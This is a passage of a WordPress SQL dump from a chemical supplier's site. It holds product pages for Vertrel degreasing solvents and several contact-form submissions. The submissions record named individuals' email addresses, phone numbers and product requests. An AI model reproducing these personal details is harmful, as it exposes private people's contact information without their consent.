inhalation toxicity.\r\n\r\nPlease refer to the MSDS for information on detailed exposure limits and toxicity-related data.\r\n\r\nVertrel SDG exhibits no closed cup or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. The product is volatile, and if allowed to evaporate and mix with air, the vapor may become flammable. Addition of alcohols such as methanol, ethanol or isopropanol to Vertrel SDG will increase the flammability of Vertrel SDG. Therefore, it is recommended that alcohol should not be mixed with SDG.\r\n\r\n<strong>Material Compatibility</strong>\r\n\r\nSDG is compatible with metals. Plastics that may show signs of softening, swelling or other changes include acrylics, ABS and polycarbonate. Elastomers, if affected, will generally revert to within a few percent of original size after air-drying. Prior-to-use, testing of plastics and elastomers should be performed under conditions expected during normal operation (e.g., time in contact with Vertrel SDG, temperature, etc.). For more information on material compatibility, contact Miller-Stephenson.\r\n\r\nContact with highly basic materials, pH 10 and above, is not recommended.\r\n\r\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">To learn more please click here.</a>\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (22172, 1268, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22173, 1277, '_wp_old_slug', 'vertrel-sfr'); 
INSERT INTO `wp_postmeta` VALUES (22174, 1276, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22175, 1276, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22176, 1276, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22177, 1276, '_yoast_wpseo_focuskw_text_input', 'Vertrel SFR'); 
INSERT INTO `wp_postmeta` VALUES (22178, 1276, '_yoast_wpseo_focuskw', 'Vertrel SFR'); 
INSERT INTO `wp_postmeta` VALUES (22179, 1276, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22180, 1276, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22181, 1276, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22182, 1276, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22183, 1276, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (22184, 1276, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (22185, 1276, '_ywtm_content_tab_description', 'Introduction to Vertrel SFR\r\n\r\nVertrel SFR is an engineered mixture of nonflammable hydrofluorocarbons (HFCs), trans-1,2-dichloroethylene (t-DCE) and methanol.\r\n\r\nVertrel SFR is designed to remove difficult to remove high temperature fluxes used in lead free and no clean solders. It has excellent solvency power for a wide range of soils including ionic soils. The low surface tension and nonflammable properties of Vertrel SFR make it an ideal ultrasonic vapor degreasing solvent.\r\n\r\nVertrel SFR is a non-ozone depleter and can replace many solvents such as trichloroethylene (TCE), n-propyl bromide (nPB), HCFC-225 blends, HCFC-141b, HFEs, PFCs, and CFCs. Vertrel SFR can also replace aqueous cleaners where floor space and cleanliness are at a premium.\r\n\r\n<strong>Features and Benefits</strong>\r\n\r\nVertrel SFR does a good job balancing performance with favorable environmental and worker safety properties.\r\n<ul>\r\n 	<li>Excellent solvency power (KB Value&gt;100) to remove organic and ionic contaminants: Superior cleaning performance</li>\r\n 	<li>Fast drying: Increases productivity</li>\r\n 	<li>Low surface tension: Able to penetrate and clean tight areas</li>\r\n 	<li>Compatible with most plastics, elastomers, and metals</li>\r\n 	<li>Can be used with ultrasonics.</li>\r\n 	<li>Non flammable</li>\r\n 	<li>Low toxicity</li>\r\n 	<li>Zero ozone depletion potential</li>\r\n 	<li>Low global warming potential</li>\r\n 	<li>Existing equipment can be used with minor or no modification</li>\r\n 	<li>No surfactants needed: Residue free cleaning is promoted.</li>\r\n</ul>\r\n<strong>Typical Applications</strong>\r\n<ul>\r\n 	<li>Defluxing</li>\r\n 	<li>Oil, grease, and wax removal</li>\r\n 	<li>Precision Cleaning</li>\r\n</ul>\r\n<strong>Specification Conformity Tests</strong>\r\n\r\nVertrel SFR has been tested in a variety of industrytests, including:\r\n\r\nBoeing D6-17487 Revision P\r\nSolvent Cleaners; General Cleaning\r\n\r\nARP 1755 B\r\nEffect of Cleaning Agent on Aircraft Engine Materials\r\n\r\nDouglas Aircraft Company\r\nType 1: Materials and Procedures for General Exterior Cleaning of\r\nPainted and Unpainted Surfaces. (General Purpose Cleaner)\r\n\r\n<strong>Environmental Properties</strong>\r\n\r\nVertrel SFR has zero ozone depletion potential and low global warming potential.  Vertrel SFR is accepted by the US Environmental Protection Agency under the Significant New Alternatives Policy (SNAP) program as a substitute for ozone-depleting substances (solvent category). It is not SNAP approved for aerosol packages.\r\n\r\n<strong>Safety/Flammability/Storage</strong>\r\n\r\nData from acute toxicity studies has demonstrated that Vertrel SFR has low toxicity. It has a calculated AEL (Acceptable Exposure Limit) of 187 ppm based on its individual components. AEL is an airborne inhalation exposure limit established by Dupont that specifies time-weighted average concentrations to which nearly all workers may be repeatedly exposed without adverse effects. The calculated AEL is in accordance with ACGIH formulas for TLVs for mixtures. Vertrel SFR is a slight skin and eye irritant and has low acute inhalation toxicity.\r\n\r\nPlease refer to the MSDS for information on detailed exposure limits and toxicity-related data.\r\n\r\nVertrel SFR exhibits no closed cup or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. The product is volatile, and if allowed to evaporate and mix with air, the vapor may become flammable.\r\n\r\nVertrel SFR is thermally stable and does not oxidize or degrade during storage. Store in a clean, dry area. Protect from freezing temperatures. If solvent is stored below –10 °C (14 °F), mix prior to use. Do not allow stored product to exceed 52 °C (125 °F) to prevent leakage or potential rupture of container from pressure and expansion.\r\n\r\n<strong>Material Compatibility</strong>\r\n\r\nMost metals, plastics and elastomers commonly used for components mounted on printed wiring board assemblies can be safely cleaned with Vertrel SFR. Plastics that may show signs of softening, swelling or other changes include acrylics, ABS and polycarbonate. Elastomers, if affected, will generally revert to within a few percent of original size after air-drying. Prior-to-use, testing of plastics and elastomers should be performed under conditions expected during normal operation (e.g., time in contact with SFR, temperature, etc.). For more information on material compatability, contact Miller-Stephenson.\r\n\r\nContact with highly basic materials, pH 10 and above, is not recommended.\r\n\r\nLarge amounts of water may extract the alcohol component of Vertrel SFR, and reduce cleaning performance. Therefore, to reduce alcohol loss, use desiccant dryers rather than water separators in the condensate return line.\r\n\r\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">Please click here for more information regarding solvents and replacements.</a>\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (22186, 1276, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22187, 2335, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22188, 2335, '_seq_num', '29'); 
INSERT INTO `wp_postmeta` VALUES (22189, 2335, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22190, 2335, '_field_12', 'Tom'); 
INSERT INTO `wp_postmeta` VALUES (22191, 2335, '_field_13', 'Anderson'); 
INSERT INTO `wp_postmeta` VALUES (22192, 2335, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22193, 2335, '_field_14', 'tanderson@jeron.com'); 
INSERT INTO `wp_postmeta` VALUES (22194, 2335, '_field_15', '(773) 275-1900'); 
INSERT INTO `wp_postmeta` VALUES (22195, 2335, '_field_16', 'Request sds for acrylic conformal coating'); 
INSERT INTO `wp_postmeta` VALUES (22196, 2335, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22197, 2335, '_sub_id', '2335'); 
INSERT INTO `wp_postmeta` VALUES (22198, 2336, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22199, 2336, '_seq_num', '30'); 
INSERT INTO `wp_postmeta` VALUES (22200, 2336, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22201, 2336, '_field_12', 'Stephanie Bidwell'); 
INSERT INTO `wp_postmeta` VALUES (22202, 2336, '_field_13', 'Cardinal Compliance Consultants'); 
INSERT INTO `wp_postmeta` VALUES (22203, 2336, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22204, 2336, '_field_14', 'sbidwell@cardinalhs.net'); 
INSERT INTO `wp_postmeta` VALUES (22205, 2336, '_field_15', '(419) 882-9224'); 
INSERT INTO `wp_postmeta` VALUES (22206, 2336, '_field_16', 'Please provide your most current SDS Sheets on the following:\r\nSilicone Conformal Coating MS-460H\r\nSilicone Conformal Coating MS-460C'); 
INSERT INTO `wp_postmeta` VALUES (22207, 2336, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22208, 2336, '_sub_id', '2336'); 
INSERT INTO `wp_postmeta` VALUES (22209, 1935, '_wp_attachment_image_alt', 'Release Agents'); 
INSERT INTO `wp_postmeta` VALUES (22211, 1281, '_wp_old_slug', 'vertrel-xf'); 
INSERT INTO `wp_postmeta` VALUES (22212, 1278, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22213, 1278, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22214, 1278, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22215, 1278, '_yoast_wpseo_focuskw_text_input', 'Vertrel XF'); 
INSERT INTO `wp_postmeta` VALUES (22216, 1278, '_yoast_wpseo_focuskw', 'Vertrel XF'); 
INSERT INTO `wp_postmeta` VALUES (22217, 1278, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22218, 1278, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22219, 1278, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22220, 1278, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22221, 1278, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (22222, 1278, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (22223, 1278, '_ywtm_content_tab_description', '<strong>Introduction to Vertrel XF</strong>\r\n\r\nVertrel XF is a proprietary hydrofluorocarbon fluid with zero ozone depletion potential and low global warming potential ideally suited for use in vapor degreasing equipment for cleaning, rinsing, and drying. It can replace current hydrochlorofluorocarbon (HCFC) and perfluorocarbon (PFC) fluids in most applications.\r\n\r\nVertrel XF is HFC 43-10mee or 2,3-dihydrodeca–fluoropentane; empirical formula C5H2F10. It is a clear, colorless liquid with the properties shown in Table 1.\r\n\r\nUnique physical properties include a high density, low viscosity, and low surface tension. This combined with nonflammability, chemical and thermal stability, low toxicity, and ease of recovery by distillation make Vertrel XF ideal for a broad range of applications. Solvency is selective, but can be enhanced by use of appropriate azeotropes and blends with alcohols, hydrocarbons, esters, etc..\r\n\r\n<strong>Typical Applications</strong>\r\n<ul>\r\n 	<li>Cleaning and rinsing agent</li>\r\n 	<li>Drying fluid</li>\r\n 	<li>Particulate remover</li>\r\n 	<li>Fluorocarbon lubricant carrier</li>\r\n 	<li>Solvent and dispersion media</li>\r\n 	<li>Heat transfer media</li>\r\n 	<li>Dielectric fluid</li>\r\n 	<li>Replacement for many HCFC, PFC, and CFC-113 applications</li>\r\n</ul>\r\nVertrel XF is ideally suited for cleaning fine particulate matter (submicron range) from metal and nonmetal parts. Removal of particle contamination requires a solvent that can minimize the thickness of the laminar boundary layer where particles are bonded to the substrate. If the boundary layer thickness is less than the particle diameter, momentum from the flowing solvent can efficiently dislodge the particles and carry them away. Vertrel XF, with its lower viscosity and higher density, results in a thinner boundary layer, which enhances cleaning. Common aqueous cleaning fluids, mixtures of water and detergent, have higher viscosities and lower densities compared to Vertrel XF, making these fluids less efficient.\r\n\r\nThe electronic attraction between particle and surface can be overcome further by increasing the polarity of the fluid through the addition of small amounts of alcohols. Chemours offers a series of proprietary azeotrope and blend compositions that exploit this property.\r\n\r\nAnother common cleaning technique is the addition of ultrasonics to the solvent. High frequency, ultrasonic waves produce tiny bubbles that form and collapse (cavitate) as the wave passes. Cavitation energy increases with decreasing viscosity, another advantage of Vertrel XF, improving its ability to mechanically dislodge particle contamination.\r\n\r\n<strong>Vapor Degreasing Process</strong>\r\n\r\nUse of modern vapor containment technology is recommended for both batch and in-line equipment. These systems have higher freeboard and a secondary set of low-temperature (–29°C [–20°F]) condenser coils to greatly reduce vapor losses from boiling solvent degreasing, defluxing, rinsing, and drying equipment.\r\n\r\nNeat Vertrel XF can be used for rinsing, drying, and some cleaning applications, but use with other components, such as azeotropes or simple blends, can provide improved solvency and soil removal. Vertrel XF forms azeotropes or constant boiling mixtures with many similar boiling range components. Five nonflammable proprietary azeotrope compositions have been developed that are useful for general, as well as precision, cleaning and defluxing. See specific product bulletins for details.\r\n\r\n<strong>Table 1.</strong> Density and Vapor Pressure Change with Temperature\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="250"><strong>Temperature, °C (°F)</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Density, kg/L</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Vapor Pressure, atm</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">-20 (–4)</td>\r\n<td style="text-align: center;">1.7</td>\r\n<td style="text-align: center;">0.021</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">-10 (14)</td>\r\n<td style="text-align: center;">1.68</td>\r\n<td style="text-align: center;">0.047</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">0 (32)</td>\r\n<td style="text-align: center;">1.66</td>\r\n<td style="text-align: center;">0.082</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">10 (50)</td>\r\n<td style="text-align: center;">1.62</td>\r\n<td style="text-align: center;">0.143</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">20 (68)</td>\r\n<td style="text-align: center;">1.6</td>\r\n<td style="text-align: center;">0.232</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">30 (86)</td>\r\n<td style="text-align: center;">1.57</td>\r\n<td style="text-align: center;">0.374</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">40 (104)</td>\r\n<td style="text-align: center;">1.55</td>\r\n<td style="text-align: center;">0.571</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">50 (122)</td>\r\n<td style="text-align: center;">1.51</td>\r\n<td style="text-align: center;">0.843</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">60 (140)</td>\r\n<td style="text-align: center;">1.49</td>\r\n<td style="text-align: center;">1.212</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">70 (158)</td>\r\n<td style="text-align: center;">1.46</td>\r\n<td style="text-align: center;">1.695</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">80 (176)</td>\r\n<td style="text-align: center;">1.43</td>\r\n<td style="text-align: center;">2.306</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">90 (194)</td>\r\n<td style="text-align: center;">1.4</td>\r\n<td style="text-align: center;">3.083</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">100 (212)</td>\r\n<td style="text-align: center;">1.38</td>\r\n<td style="text-align: center;">4.042</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">110 (230)</td>\r\n<td style="text-align: center;">1.34</td>\r\n<td style="text-align: center;">5.211</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">120 (248)</td>\r\n<td style="text-align: center;">1.32</td>\r\n<td style="text-align: center;">6.621</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">130 (266)</td>\r\n<td style="text-align: center;">1.3</td>\r\n<td style="text-align: center;">8.301</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Solvency</strong>\r\n\r\nUnlike PFCs, Vertrel XF is completely miscible with most esters, ketones, ethers, ether-alcohols, and the lower alcohols, such as methanol, ethanol, and isopropanol. The lower hydrocarbons, such as hexane and heptane, are also soluble. Neat Vertrel XF has limited solvency for many higher molecular weight materials, such as hydrocarbon oils, silicone oils, waxes, and greases; here combinations with the many readily miscible esters, alcohols, and lower hydrocarbons can enhance solubility and cleaning efficiency. Like CFC-113 and PFCs, Vertrel XF has high solubility for Krytox and “Fomblin” fluorocarbon lubricants and can be used either as an application carrier fluid or to remove them.\r\n\r\n<strong>Plastic and Elastomer Compatibility</strong>\r\n\r\nA large variety of plastics and elastomers can be safely exposed to Vertrel XF. Tables 2 and 3 summarize test results on short-term exposures of unstressed plastics and elastomers, which simulate a typical cleaning cycle.\r\n\r\nLong-term compatibility data simulating exposure of vapor degreaser construction materials is available from Chemours upon request.\r\n\r\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of plastics and elastomers. Therefore, prior in-use testing is particularly important.\r\n\r\n<strong>Table 2</strong>. Plastic Compatibility Immersion: 15 Minutes at Room Temperature\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456"><strong>Compatible</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Polyethylene</td>\r\n<td>ABS</td>\r\n</tr>\r\n<tr>\r\n<td>Polypropylene</td>\r\n<td>Acetal</td>\r\n</tr>\r\n<tr>\r\n<td>Polystyrene</td>\r\n<td>Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td>Polyester, PET, PBT</td>\r\n<td>Ionomer</td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Oxide, PPO</td>\r\n<td>Liquid Crystal Polymer</td>\r\n</tr>\r\n<tr>\r\n<td>Polyimide, PI, PEI, PAI</td>\r\n<td>Phenolic</td>\r\n</tr>\r\n<tr>\r\n<td>Polyetherketone, PEK</td>\r\n<td>PVC, CPVC</td>\r\n</tr>\r\n<tr>\r\n<td>Polyaryletherketone, PEEK</td>\r\n<td>PTFE, ETFE</td>\r\n</tr>\r\n<tr>\r\n<td>Polysulfone</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Polyarylsulfone</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Sulfide, PPS</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Incompatible*</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Acrylic</td>\r\n<td>Cellulosic</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Table 3</strong>. Elastomer Compatibility Immersion: 15 Minutes at Room Temperature\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td colspan="2" width="456">Compatible</td>\r\n</tr>\r\n<tr>\r\n<td>Buna-N, NBR, Nitrile</td>\r\n<td>Buna-S, SBR, GRS</td>\r\n</tr>\r\n<tr>\r\n<td>Butyl Rubber, IIR</td>\r\n<td>Chlorosulfonated PE</td>\r\n</tr>\r\n<tr>\r\n<td>EPM, EPDM, Nordel®</td>\r\n<td>Polysulfide</td>\r\n</tr>\r\n<tr>\r\n<td>Natural Rubber, Isoprene</td>\r\n<td>Neoprene</td>\r\n</tr>\r\n<tr>\r\n<td>Urethane</td>\r\n<td>Viton™ B</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td>Silicone</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">Incompatible*</td>\r\n</tr>\r\n<tr>\r\n<td>None Tested</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*Material composition varies depending upon compounding agents, plasticizers, processing, etc. Specific materials should be tested for compatibility with solvent.\r\n\r\n<strong>Metals and Other Compatibility</strong>\r\n\r\nVertrel XF is fully compatible with the metals listed below after exposure for two weeks at 100°C (212°F) in sealed tubes with and without water contact.\r\n<ul>\r\n 	<li>Zinc*</li>\r\n 	<li>Stainless Steel</li>\r\n 	<li>Brass*</li>\r\n 	<li>Aluminum</li>\r\n 	<li>Copper*</li>\r\n</ul>\r\n*Slight discoloration with water present\r\n\r\nVertrel XF is not compatible with strong bases; therefore, contact with highly basic process materials is not recommended.\r\n\r\n<strong>Exposure Limits</strong>\r\n\r\nData from acute toxicity studies has demonstrated that Vertrel XF has low toxicity. Vertrel XF is a slight skin and eye irritant and has low acute inhalation toxicity.\r\n\r\n<strong>Safety/Flammability</strong>\r\n\r\nVertrel XF is nonflammable and does not become flammable during boiling or evaporation. It exhibits no closed or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. It is thermally stable to 300°C (572°F) and does not oxidize or degrade during storage.\r\n\r\n<strong>Recovery</strong>\r\n\r\nVertrel XF is a pure component material and is easily recoverable by off-line and in-line distillation equipment, such as a vapor degreaser or still. The presence of soil, however, may alter the characteristics of the material during the recovery operation. Recovery should be closely monitored to ensure operating levels are maintained. Users should test the spent Vertrel XF to ensure proper classification for waste disposal.\r\n\r\n<strong>Storage/Handling</strong>\r\n\r\nVertrel XF is thermally stable and does not oxidize or degrade during storage. Store in a clean, dry area. Protect from freezing temperatures. Do not allow stored product to exceed 52°C (125°F) to prevent leakage or\r\npotential rupture of container from pressure and expansion. Consideration should be given to retrofit of existing or purchase of new, vapor degreasing equipment to provide vapor containment technology that enables safe and economical use of Vertrel XF. Drum pumps are recommended to dispense Vertrel XF from its container. Refer to the Safety Data Sheet (SDS) for specific handling precautions and instructions.\r\n\r\n<strong>Environmental Legislation</strong>\r\n\r\nVertrel XF has zero ozone depletion potential and a low global warming potential (Table 4). Vertrel XF and its azeotropes and blends are used as alternatives to CFC-113, methylchloroform, HCFCs, and PFCs in many critical cleaning, drying, carrier fluid, and other high-value specialty uses where reliability is paramount.\r\n\r\nVertrel XF is accepted by the U.S. Environmental Protection Agency (EPA) under the Significant New Alternatives Policy (SNAP) program as a substitute for ozone-depleting substances. HFC 43-10mee or\r\ndecafluoropentane is exempt from classification as a volatile organic compound (VOC) by the EPA. Vertrel XF is also VOC compliant under the California South Coast Air Quality Management District (SCAQMD) regulations, which require VOC content less than 50 g/L of solvent.\r\n\r\nVertrel XF is listed in the TSCA inventory. It is subject to the Significant New Use Rule (SNUR) and should be used only in the indicated applications. See SDS Regulatory Section.\r\n\r\nVertrel XF is not a hazardous air pollutant (HAP), and, therefore, not subject to NESHAP regulation. Spent Vertrel XF is not an RCRA characteristic or listed waste. However, addition of contaminants could change that status. Vertrel XF is not included in the SARA Title III Section 313 list of toxic chemicals and is not subject to SARA Title III (EPCRA) reporting requirements.\r\n\r\n<strong>Table 4.</strong> Environmental Properties\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Property</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Vertrel XF</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Formula</td>\r\n<td style="text-align: center;">C5H2F10</td>\r\n</tr>\r\n<tr>\r\n<td>Class</td>\r\n<td style="text-align: center;">Hydrofluorocarbon (HFC)</td>\r\n</tr>\r\n<tr>\r\n<td>Atmospheric Lifetime, yr</td>\r\n<td style="text-align: center;">17.1</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion Potential (ODP)</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>Global Warming* Potential (GWP/100 yr ITH)</td>\r\n<td style="text-align: center;">1300</td>\r\n</tr>\r\n<tr>\r\n<td>Volatile Organic Compounds (VOC, g/L)</td>\r\n<td style="text-align: center;">Exempt</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*IPCC Second Assessment Report (1995)\r\n\r\n<strong>Specifications</strong>\r\n\r\nComposition and specifications are shown in Table 5. Vertrel™ XF is listed in the TSCA Inventory.\r\n\r\n<strong>Table 5.</strong> Vertrel XF Specifications\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Property</td>\r\n<td style="text-align: center;" width="206">Vertrel™ XF</td>\r\n</tr>\r\n<tr>\r\n<td>Fluoropentanes, wt%</td>\r\n<td style="text-align: center;">99.9 min.</td>\r\n</tr>\r\n<tr>\r\n<td>Nonvolatile Residue, ppm wt</td>\r\n<td style="text-align: center;">2.0 max.</td>\r\n</tr>\r\n<tr>\r\n<td>Moisture, ppm wt</td>\r\n<td style="text-align: center;">50 max.</td>\r\n</tr>\r\n<tr>\r\n<td>Acidity, mg KOH/g</td>\r\n<td style="text-align: center;">0.01 max.</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">Clear, Colorless</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">To learn more about Vertel and nPB replacement click here.</a>'); 
INSERT INTO `wp_postmeta` VALUES (22224, 1278, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22225, 2231, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (22226, 310, '_wp_old_slug', 'releasys'); 
INSERT INTO `wp_postmeta` VALUES (22227, 310, '_yoast_wpseo_focuskw_text_input', 'Urethane mold release agent'); 
INSERT INTO `wp_postmeta` VALUES (22228, 310, '_yoast_wpseo_focuskw', 'Urethane mold release agent'); 
INSERT INTO `wp_postmeta` VALUES (22230, 425, '_oembed_5710453898cc146c4419bf5517ac9f96', '<blockquote data-secret="ipGV7JoQo5" class="wp-embedded-content"><a href="https://www.miller-stephenson.com/mold-release-agents/">Mold Release Agents: Which is right for you?</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://www.miller-stephenson.com/mold-release-agents/embed/#?secret=ipGV7JoQo5" data-secret="ipGV7JoQo5" width="600" height="338" title="&#8220;Mold Release Agents: Which is right for you?&#8221; &#8212; Miller-Stephenson Chemicals" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (22231, 425, '_oembed_time_5710453898cc146c4419bf5517ac9f96', '1475782322'); 
INSERT INTO `wp_postmeta` VALUES (22232, 425, '_wp_old_slug', 'semi-permanent-release-agent'); 
INSERT INTO `wp_postmeta` VALUES (22233, 2340, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22234, 2340, '_seq_num', '31'); 
INSERT INTO `wp_postmeta` VALUES (22235, 2340, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22236, 2340, '_field_12', 'Anna'); 
INSERT INTO `wp_postmeta` VALUES (22237, 2340, '_field_13', 'Pratt'); 
INSERT INTO `wp_postmeta` VALUES (22238, 2340, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22239, 2340, '_field_14', 'Anna.Pratt@va.gov'); 
INSERT INTO `wp_postmeta` VALUES (22240, 2340, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (22241, 2340, '_field_16', 'SDS for\n MS-730\nMS-730M\nDPMS T1029A2\n'); 
INSERT INTO `wp_postmeta` VALUES (22242, 2340, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22243, 2340, '_sub_id', '2340'); 
INSERT INTO `wp_postmeta` VALUES (22244, 310, '_wp_old_slug', 'semi-permanent-release-agent-2'); 
INSERT INTO `wp_postmeta` VALUES (22245, 310, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (22246, 2341, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (22247, 2341, '_seq_num', '36'); 
INSERT INTO `wp_postmeta` VALUES (22248, 2341, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22249, 2341, '_field_1', 'Rui Ding'); 
INSERT INTO `wp_postmeta` VALUES (22250, 2341, '_field_10', 'Iowa State University'); 
INSERT INTO `wp_postmeta` VALUES (22251, 2341, '_field_2', 'ruiding@iastate.edu'); 
INSERT INTO `wp_postmeta` VALUES (22252, 2341, '_field_8', '5155093147'); 
INSERT INTO `wp_postmeta` VALUES (22253, 2341, '_field_3', 'Hi, I am a research associate from Iowa State University. I am wondering  if I can request for Epon 828 and Epikure 3270 of sample size for the purpose of studying epoxy composites. Thank you very much!'); 
INSERT INTO `wp_postmeta` VALUES (22254, 2341, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (22255, 2341, '_sub_id', '2341'); 
INSERT INTO `wp_postmeta` VALUES (22256, 2342, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (22257, 2342, '_seq_num', '37'); 
INSERT INTO `wp_postmeta` VALUES (22258, 2342, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22259, 2342, '_field_1', 'Ping Furlan'); 
INSERT INTO `wp_postmeta` VALUES (22260, 2342, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (22261, 2342, '_field_2', 'ping.furlan@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (22262, 2342, '_field_8', '(814) 572-5678'); 
INSERT INTO `wp_postmeta` VALUES (22263, 2342, '_field_3', 'I am interested in purchasing your Teflon spray mold release agent, MS-122AD/122ADL.  Look forward to hearing from you. Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (22264, 2342, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (22265, 2342, '_sub_id', '2342'); 
INSERT INTO `wp_postmeta` VALUES (22266, 2343, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22267, 2343, '_seq_num', '32'); 
INSERT INTO `wp_postmeta` VALUES (22268, 2343, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22269, 2343, '_field_12', 'eynaud'); 
INSERT INTO `wp_postmeta` VALUES (22270, 2343, '_field_13', 'sigma aldrich '); 
INSERT INTO `wp_postmeta` VALUES (22271, 2343, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22272, 2343, '_field_14', 'claudie.eynaud@sial.com'); 
